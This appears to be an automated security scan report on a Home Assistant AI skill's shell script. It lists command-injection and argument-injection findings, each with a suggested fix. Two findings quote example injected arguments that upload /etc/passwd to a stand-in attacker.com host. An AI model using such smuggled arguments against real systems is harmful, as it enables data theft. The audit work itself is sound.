Trust Assessment
home-assistant received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 3 critical, 0 high, 1 medium, and 0 low severity. Key findings include Sensitive environment variable access: $HOME, Command Injection via HA_CONFIG environment variable, Command Injection and Data Exfiltration via 'call' command's data argument.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 10/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Command Injection via HA_CONFIG environment variable The `CONFIG_FILE` variable, which determines the path to the Home Assistant configuration file, is derived from the `HA_CONFIG` environment variable. If an attacker can control `HA_CONFIG`, they can inject shell metacharacters (e.g., `;`, `$(...)`, `|`) into the file path. When `$CONFIG_FILE` is subsequently used in `jq` commands (e.g., to extract URL and token), these metacharacters can be executed by the shell, leading to arbitrary command execution on the host system. When constructing file paths from environment variables, sanitize or strictly validate the input to prevent shell metacharacter injection. Consider using `readlink -f` or similar to resolve and validate paths, or explicitly disallow shell metacharacters in `HA_CONFIG`. | LLM | scripts/ha.sh:8 | |
| CRITICAL | Command Injection and Data Exfiltration via 'call' command's data argument The `call` command allows users to provide arbitrary JSON data via its third argument (`$data`). This `$data` argument is directly interpolated into the `curl -d "$data"` command within the `api` function. An attacker can inject arbitrary `curl` options (e.g., `--upload-file /etc/passwd`) or shell commands by crafting the `$data` argument to break out of the JSON string (e.g., `" --upload-file /etc/passwd -X POST http://attacker.com/exfil`). This leads to arbitrary command execution and potential data exfiltration of sensitive files or environment variables. Sanitize or strictly validate the `$data` input. Prefer passing JSON data to `curl` via stdin (`-d @-`) after constructing it safely (e.g., using `jq -c .` to ensure valid JSON and escape special characters), or ensure all user-controlled parts are properly quoted for the shell and `curl`. | LLM | scripts/ha.sh:140 | |
| CRITICAL | Command Injection and Data Exfiltration in API calls with user-controlled arguments Multiple commands (`state`, `states`, `on`, `off`, `toggle`, `scene`, `script`, `automation`, `climate`, `list`, `search`) construct `curl` commands using user-controlled variables (`$entity`, `$brightness`, `$scene`, `$script`, `$auto`, `$temp`, `$filter`, `$pattern`). The `api` function uses `"$@"`, which allows these variables to be interpreted as new `curl` arguments if they contain shell metacharacters or `curl` option prefixes (e.g., `light.room" --upload-file /etc/passwd -X POST http://attacker.com/exfil`). This can lead to arbitrary command execution and data exfiltration of sensitive files or environment variables. Implement robust input validation for all user-controlled variables. Modify the `api` function to prevent argument injection by strictly separating URL paths and data payloads. For URL paths, ensure proper URL encoding. For JSON data, construct payloads using a safe method (e.g., `jq -n --arg key "$value" '{$key: $value}'`) and pass them to `curl` via stdin (`-d @-`) to prevent shell interpretation. | LLM | scripts/ha.sh:29 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/snail3d/voice-devotional/skills/home-assistant/scripts/ha.sh:7 |
Scan History
Embed Code
[](https://skillshield.io/report/4369ae8306b7db1f)
Powered by SkillShield